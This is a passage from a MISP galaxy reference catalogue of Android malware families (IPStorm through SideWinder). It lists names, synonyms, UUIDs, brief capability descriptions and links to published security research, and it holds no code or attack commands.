- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://twitter.com/muha2xmad/status/1570788983474638849 - webarchive
- https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0 - webarchive
- https://medium.com/@joshuapenny88/hostinghunter-series-chang-way-technologies-co-limited-a9ba4fce0f65 - webarchive
- https://cryptax.medium.com/android-bianlian-payload-61febabed00a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IPStorm (Android)
Android variant of IPStorm (InterPlanetary Storm).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (Android).
Known Synonyms |
---|
InterPlanetary Storm |
Internal MISP references
UUID dc0c8824-64ac-4ab2-a0e4-955a14ecc59c
which can be used as unique global reference for IPStorm (Android)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf - webarchive
- https://www.justice.gov/usao-pr/pr/russian-and-moldovan-national-pleads-guilty-operating-illegal-botnet-proxy-service - webarchive
- https://blog.barracuda.com/2020/10/01/threat-spotlight-new-interplanetary-storm-variant-iot/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IRATA
According to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.
Internal MISP references
UUID 24fb43b4-d6a6-49c0-a862-4211a245b635
which can be used as unique global reference for IRATA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IRRat
Internal MISP references
UUID 3e7c6e8c-46fc-4498-a28d-5b3d144c51cf
which can be used as unique global reference for IRRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JadeRAT
Internal MISP references
UUID 8804e02c-a139-4c3d-8901-03302ca1faa0
which can be used as unique global reference for JadeRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Joker
Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google's official app store by changing its trail signatures, which includes updating the malware's code, execution process, and payload-retrieval techniques. This malware is capable of stealing users' personal information, including contact details, device data, WAP services, and SMS messages.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Joker.
Known Synonyms |
---|
Bread |
Internal MISP references
UUID aa2ad8f4-3c46-4f16-994b-2a79c7481cac
which can be used as unique global reference for Joker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker - webarchive
- https://www.threatfabric.com/blogs/toad-fraud - webarchive
- https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1 - webarchive
- https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/ - webarchive
- https://labs.k7computing.com/?p=22199 - webarchive
- https://muha2xmad.github.io/malware-analysis/hydra/ - webarchive
- https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/ - webarchive
- https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451 - webarchive
- https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/ - webarchive
- https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html - webarchive
- https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html - webarchive
- https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2 - webarchive
- https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus - webarchive
- https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KevDroid
Internal MISP references
UUID 1e1924b5-89cb-408b-bcee-d6aaef7b24e0
which can be used as unique global reference for KevDroid
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid - webarchive
- https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KnSpy
Internal MISP references
UUID 084ebca7-91da-4d9c-8211-a18f358ac28b
which can be used as unique global reference for KnSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.knspy - webarchive
- https://community.riskiq.com/article/6f60db72 - webarchive
- https://s.tencent.com/research/report/951.html - webarchive
- https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html - webarchive
- https://twitter.com/voodoodahl1/status/1267571622732578816 - webarchive
- https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/ - webarchive
- https://blog.talosintelligence.com/2020/10/donot-firestarter.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Koler
Internal MISP references
UUID 4ff34778-de4b-4f48-9184-4975c8ccc3f3
which can be used as unique global reference for Koler
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Konni (Android)
Internal MISP references
UUID d4f90ffc-72cb-49a5-b796-527785f49161
which can be used as unique global reference for Konni (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KSREMOTE
Internal MISP references
UUID 196d51bf-cf97-455d-b997-fc3e377f2188
which can be used as unique global reference for KSREMOTE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LittleLooter
Internal MISP references
UUID 41cb4397-7ae0-4a9f-894f-47828e768aa9
which can be used as unique global reference for LittleLooter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter - webarchive
- https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf - webarchive
- https://www.youtube.com/watch?v=nilzxS9rxEM - webarchive
- https://twitter.com/malwrhunterteam/status/1337684036374945792 - webarchive
- https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Loki
Internal MISP references
UUID a6f481fe-b6db-4507-bb3c-28f10d800e2f
which can be used as unique global reference for Loki
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LokiBot
Android banking Trojan with standard banking capabilities such as overlays and SMS stealing. It also features ransomware functionality. Note that the network traffic is obfuscated in the same way as in Android BankBot.
Internal MISP references
UUID 4793a29b-1191-4750-810e-9301a6576fc4
which can be used as unique global reference for LokiBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot - webarchive
- https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html - webarchive
- https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/ - webarchive
- https://muha2xmad.github.io/mal-document/lokibotpdf/ - webarchive
- https://isc.sans.edu/diary/27282 - webarchive
- https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/ - webarchive
- https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ - webarchive
- https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf - webarchive
- https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LuckyCat
Internal MISP references
UUID 1785a4dd-4044-4405-91c2-efb722801867
which can be used as unique global reference for LuckyCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mandrake
Internal MISP references
UUID 0f587654-7f70-43be-9f1f-95e3a2cc2014
which can be used as unique global reference for Mandrake
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Marcher
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Marcher.
Known Synonyms |
---|
ExoBot |
Internal MISP references
UUID f691663a-b360-4c0d-a4ee-e9203139c38e
which can be used as unique global reference for Marcher
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware - webarchive
- https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MasterFred
According to Heimdal, MasterFred is an Android trojan that makes use of fake login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The attackers' goal is to steal credit card information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MasterFred.
Known Synonyms |
---|
Brox |
Internal MISP references
UUID 87131ea3-4c5e-42ba-a8e2-edd62a0bcd8d
which can be used as unique global reference for MasterFred
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MazarBot
Internal MISP references
UUID 38cbdc29-a5af-46ae-ab82-baf3f6999826
which can be used as unique global reference for MazarBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Medusa (Android)
According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It uses TCP for C&C communication and targets Turkish banks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Medusa (Android).
Known Synonyms |
---|
Gorgona |
Internal MISP references
UUID f155e529-dbea-4e4d-9df3-518401191c82
which can be used as unique global reference for Medusa (Android)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa - webarchive
- https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html - webarchive
- https://www.cleafy.com/cleafy-labs/medusa-reborn-a-new-compact-variant-discovered - webarchive
- https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html - webarchive
- https://twitter.com/ThreatFabric/status/1285144962695340032 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Meterpreter (Android)
Internal MISP references
UUID e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52
which can be used as unique global reference for Meterpreter (Android)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter - webarchive
- https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html - webarchive
- https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe - webarchive
- https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12 - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MobileOrder
Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely distributed through other channels such as social engineering.
Internal MISP references
UUID ee19588f-9752-4516-85f4-de18acfc64b3
which can be used as unique global reference for MobileOrder
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Monokle
Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques, as well as the ability to install an attacker-specified certificate into the trusted certificates on an infected device, which would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, it is believed to be developed by Special Technology Center (STC), a Russian defense contractor sanctioned by the U.S. Government in connection with alleged interference in the 2016 US presidential elections.
Internal MISP references
UUID 739d6d22-b187-4754-9098-22625ea612cc
which can be used as unique global reference for Monokle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoqHao
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MoqHao.
Known Synonyms |
---|
Shaoye |
XLoader |
Internal MISP references
UUID 41a9408d-7020-4988-af2c-51baf4d20763
which can be used as unique global reference for MoqHao
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao - webarchive
- https://www.xanhacks.xyz/p/moqhao-malware-analysis - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/ - webarchive
- https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/ - webarchive
- https://securelist.com/roaming-mantis-part-v/96250/ - webarchive
- https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html - webarchive
- https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf - webarchive
- https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/ - webarchive
- https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/ - webarchive
- https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1 - webarchive
- https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681 - webarchive
- https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf - webarchive
- https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/ - webarchive
- https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484 - webarchive
- https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html - webarchive
- https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends - webarchive
- https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MOrder RAT
Internal MISP references
UUID f91f27ad-edcd-4e3d-824e-23f6acd81a7b
which can be used as unique global reference for MOrder RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mudwater
Internal MISP references
UUID 9a8a5dd0-c86e-40d1-bc94-51070447c907
which can be used as unique global reference for Mudwater
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MysteryBot
MysteryBot is an Android banking Trojan with overlay capabilities that support Android 7/8; it also provides other features such as keylogging and ransomware functionality.
Internal MISP references
UUID 0a53ace4-98ae-442f-be64-b8e373948bde
which can be used as unique global reference for MysteryBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nexus
Internal MISP references
UUID fe0b4e6e-268e-4c63-a095-bf1ddff95055
which can be used as unique global reference for Nexus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OmniRAT
Internal MISP references
UUID ec936d58-6607-4e33-aa97-0e587bbbdda5
which can be used as unique global reference for OmniRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat - webarchive
- https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/ - webarchive
- https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT - webarchive
- https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Oscorp
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Oscorp.
Known Synonyms |
---|
UBEL |
Internal MISP references
UUID 8d383260-102f-46da-8cc6-7659cbbd9452
which can be used as unique global reference for Oscorp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PackChat
Internal MISP references
UUID b0f56103-1771-4e01-9ed7-44149e39ce93
which can be used as unique global reference for PackChat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PhantomLance
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PhantomLance.
Known Synonyms |
---|
PWNDROID1 |
Internal MISP references
UUID a73375a5-3384-4515-8538-b598d225586d
which can be used as unique global reference for PhantomLance
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance - webarchive
- https://securelist.com/it-threat-evolution-q2-2020/98230 - webarchive
- https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf - webarchive
- https://securelist.com/apt-phantomlance/96772/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phoenix
Internal MISP references
UUID b5d57344-0486-4580-a437-54c61cb0bf4d
which can be used as unique global reference for Phoenix
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PhoneSpy
According to Zimperium, PhoneSpy is a spyware aimed at South Korean residents with Android devices.
Internal MISP references
UUID ff00bbb6-6856-4cf5-adde-d1cc536dd0e2
which can be used as unique global reference for PhoneSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PINEFLOWER
According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features to facilitate device location tracking; deleting, downloading, and uploading files; reading connectivity state, speed, and activity; and toggling Bluetooth, Wi-Fi, and mobile data settings.
Internal MISP references
UUID a17a7c5d-0a8f-42e7-b4c9-63c258267776
which can be used as unique global reference for PINEFLOWER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PixPirate
According to PCrisk, PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.
In addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.
Internal MISP references
UUID cdf707bd-a8b0-4ee3-917d-a56b11f30206
which can be used as unique global reference for PixPirate
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PixStealer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PixStealer.
Known Synonyms |
---|
BrazKing |
Internal MISP references
UUID 5d047596-eb67-4fed-b41d-65fa975150c5
which can be used as unique global reference for PixStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixstealer - webarchive
- https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/ - webarchive
- https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PjobRAT
Internal MISP references
UUID 6fa6c769-2546-4a5c-a3c7-24dda4ab597d
which can be used as unique global reference for PjobRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat - webarchive
- https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/ - webarchive
- https://labs.k7computing.com/?p=22537 - webarchive
- https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Podec
Internal MISP references
UUID 82f9c4c1-2619-4236-a701-776c6c781f45
which can be used as unique global reference for Podec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Agent (Android)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (Android).
Known Synonyms |
---|
Popr-d30 |
Internal MISP references
UUID 0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf
which can be used as unique global reference for X-Agent (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fake Pornhub
Internal MISP references
UUID 3272a8d8-8323-4e98-b6ce-cb40789a3616
which can be used as unique global reference for Fake Pornhub
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Premier RAT
Internal MISP references
UUID 661471fe-2cb6-4b83-9deb-43225192a849
which can be used as unique global reference for Premier RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rafel RAT
Internal MISP references
UUID cdaa0a6d-3709-4e6f-8807-fff388baaba0
which can be used as unique global reference for Rafel RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RambleOn
Internal MISP references
UUID 41ab3c99-297c-465c-8375-3e9f7ce4b996
which can be used as unique global reference for RambleOn
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rana
Internal MISP references
UUID 65a8e406-b535-4c0a-bc6d-d1bec3c55623
which can be used as unique global reference for Rana
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RatMilad
RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East. The malware is spread through links on social media and pretends to be an application for services like VPN and phone number spoofing. Unwary users download these trojanized applications and grant the malware access.
Internal MISP references
UUID 542c3e5e-2124-4c36-af05-65893974d5ce
which can be used as unique global reference for RatMilad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Raxir
Internal MISP references
UUID f5cabe73-b5d6-4503-8350-30a6d54c32ef
which can be used as unique global reference for Raxir
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedAlert2
RedAlert 2 is a new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim from being notified. As a distribution vector, RedAlert 2 uses third-party app stores and imitates real Android apps like Viber and WhatsApp, or poses as fake Adobe Flash Player updates.
Internal MISP references
UUID e9aaab46-abb1-4390-b37b-d0457d05b28f
which can be used as unique global reference for RedAlert2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2 - webarchive
- https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RemRAT
Internal MISP references
UUID 23809a2b-3c24-41c5-a310-2b8045539202
which can be used as unique global reference for RemRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Retefe (Android)
The Android app used for Retefe is an SMS stealer, used to forward mTAN codes to the threat actor. Furthermore, a bank logo is added to the specific Android app to trick users into thinking it is a legitimate app. Moreover, if the visitor is not an intended victim, the download link does not serve the malicious APK but the real 'Signal Private Messenger' app, so that phone does not get infected.
Internal MISP references
UUID 22ef1e56-7778-41d1-9b2b-737aa5bf9777
which can be used as unique global reference for Retefe (Android)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe - webarchive
- http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html - webarchive
- http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/ - webarchive
- http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html - webarchive
- http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html - webarchive
- http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html - webarchive
- https://www.govcert.admin.ch/blog/33/the-retefe-saga - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Revive
According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.
Internal MISP references
UUID 25669934-14bf-463f-bcae-c59c590c3bf8
which can be used as unique global reference for Revive
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Riltok
Internal MISP references
UUID d7b347f8-77a5-4197-b818-f3af504da2c1
which can be used as unique global reference for Riltok
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Roaming Mantis
Internal MISP references
UUID 31d2ce1f-44bf-4738-a41d-ddb43466cd82
which can be used as unique global reference for Roaming Mantis
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis - webarchive
- https://systemweakness.com/investigating-a-fake-mobile-payment-smishing-that-abuses-duck-dns-d07c72468ba8 - webarchive
- https://securelist.com/roaming-mantis-part-v/96250/ - webarchive
- https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf - webarchive
- https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/ - webarchive
- https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/ - webarchive
- https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/ - webarchive
- https://systemweakness.com/a-strange-font-smishing-that-changes-behaviour-based-on-user-agent-and-abuses-duck-dns-1c1a45863ff7 - webarchive
- https://securelist.com/roaming-mantis-reaches-europe/105596/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rogue
Internal MISP references
UUID 4b53480a-8006-4af7-8e4e-cc8727c62648
which can be used as unique global reference for Rogue
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rootnik
Internal MISP references
UUID db3dcfd1-79d2-4c91-898f-5f2463d7c417
which can be used as unique global reference for Rootnik
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik - webarchive
- https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java - webarchive
- https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sauron Locker
Internal MISP references
UUID a7c058cf-d482-42cf-9ea7-d5554287ea65
which can be used as unique global reference for Sauron Locker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SharkBot
SharkBot is a piece of malicious software targeting Android Operating Systems (OSes). It is designed to obtain and misuse financial data by redirecting and stealthily initiating money transfers. SharkBot is particularly active in Europe (United Kingdom, Italy, etc.), but its activity has also been detected in the United States.
Internal MISP references
UUID 7b20fdb1-5aee-4f17-a88e-bcd72c893f0a
which can be used as unique global reference for SharkBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.sharkbot - webarchive
- https://muha2xmad.github.io/malware-analysis/sharkbot/ - webarchive
- https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/ - webarchive
- https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html - webarchive
- https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf - webarchive
- https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/ - webarchive
- https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/ - webarchive
- https://bin.re/blog/the-dgas-of-sharkbot/ - webarchive
- https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe - webarchive
- https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SideWinder (Android)
